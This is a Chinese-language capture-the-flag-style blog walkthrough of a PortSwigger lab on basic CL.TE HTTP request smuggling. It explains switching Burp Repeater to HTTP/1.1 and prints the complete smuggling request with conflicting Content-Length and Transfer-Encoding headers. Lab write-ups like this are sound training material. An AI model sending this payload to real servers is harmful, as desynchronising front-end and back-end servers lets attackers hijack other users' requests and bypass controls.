BP靶场:HTTP request smuggling HTTP请求走私携带

Lab: HTTP request smuggling, basic CL.TE vulnerability

目录

Lab: HTTP request smuggling, basic CL.TE vulnerability

0x01.查看Lab的注意事项

0x02.登陆到Lab中,使用BrupSuite找到HTTP历史记录中的浏览记录

1x01 找到第一条请求,发送到重发器​编辑

1x02 看到当前的HTTP请求协议是 HTTP/2

1x03 需要修改INSPECTOR中的HTTP协议选项​编辑

1x04 请求协议修改为 HTTP/1.1

0x03. 将请求修改为payload的内容

0x01.查看Lab的注意事项

这点很重要,HTTP/2协议,无法完成本Lab

 

0x02.登陆到Lab中,使用BrupSuite找到HTTP历史记录中的浏览记录

1x01 找到第一条请求,发送到重发器

 

1x02 看到当前的HTTP请求协议是 HTTP/2

1x03 需要修改INSPECTOR中的HTTP协议选项

 

1x04 请求协议修改为 HTTP/1.1

 

0x03. 将请求修改为payload的内容

POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G

 点击发送两次相同的内容

发送1:

 发送2:

 

ps:中间截图操作时间有点长,Lab自动释放了,导致最后的Host地址和前面的不一样,但是不影响出现结果。Lab10分钟左右不操作就可能会释放。

总结:
    想要通过Lab还是很容易的,需要注意以下几点:
        1.Lab的注意内容和提示内容,很有可能是没有修改HTTP协议导致无法通过
        2.修改HTTP协议的地方,V2022.3.9版本在最右边的侧边栏,其他版本也可以在附近位置找一下
        3.一定要将HTTP/2协议,修改为HTTP/1协议

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值